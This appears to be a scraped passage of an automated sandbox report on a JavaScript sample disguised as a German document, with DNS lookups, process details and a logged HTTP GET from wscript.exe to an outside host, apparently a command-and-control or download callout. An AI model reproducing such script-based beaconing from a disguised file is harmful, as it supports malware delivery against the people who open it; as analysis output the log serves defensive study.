                  Jan 9, 2025 13:43:37.447720051 CET53638041.1.1.1192.168.2.5
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jan 9, 2025 13:41:09.942955017 CET192.168.2.51.1.1.10x1e76Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                  Jan 9, 2025 13:43:13.725763083 CET192.168.2.51.1.1.10x7448Standard query (0)www.giuseppedeluigi.comA (IP address)IN (0x0001)false
                  Jan 9, 2025 13:43:37.366251945 CET192.168.2.51.1.1.10x1e4fStandard query (0)www.frerecapucinbenin.orgA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jan 9, 2025 13:41:09.950124979 CET1.1.1.1192.168.2.50x1e76Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                  Jan 9, 2025 13:43:13.812928915 CET1.1.1.1192.168.2.50x7448No error (0)www.giuseppedeluigi.com188.40.120.141A (IP address)IN (0x0001)false
                  Jan 9, 2025 13:43:37.447720051 CET1.1.1.1192.168.2.50x1e4fNo error (0)www.frerecapucinbenin.orgfrerecapucinbenin.orgCNAME (Canonical name)IN (0x0001)false
                  Jan 9, 2025 13:43:37.447720051 CET1.1.1.1192.168.2.50x1e4fNo error (0)frerecapucinbenin.org86.107.32.28A (IP address)IN (0x0001)false
                  • www.giuseppedeluigi.com
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.564780188.40.120.1414434148C:\Windows\System32\wscript.exe
                  TimestampBytes transferredDirectionData
                  2025-01-09 12:43:14 UTC224OUTGET /search.php?xxcktjjjheggcyu=9137952416303845 HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  Accept-Language: en-ch
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: www.giuseppedeluigi.com
                  2025-01-09 12:43:15 UTC193INHTTP/1.1 404 Not Found
                  Date: Thu, 09 Jan 2025 12:43:15 GMT
                  Server: Apache
                  X-Frame-Options: SAMEORIGIN
                  Content-Length: 208
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  2025-01-09 12:43:15 UTC208INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 65 61 72 63 68 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /search.php was not found on this server.</p></body></html>


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Target ID:0
                  Start time:07:40:34
                  Start date:09/01/2025
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\digitalisierungskonzept_muster.js"
                  Imagebase:0x7ff7c1110000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  No disassembly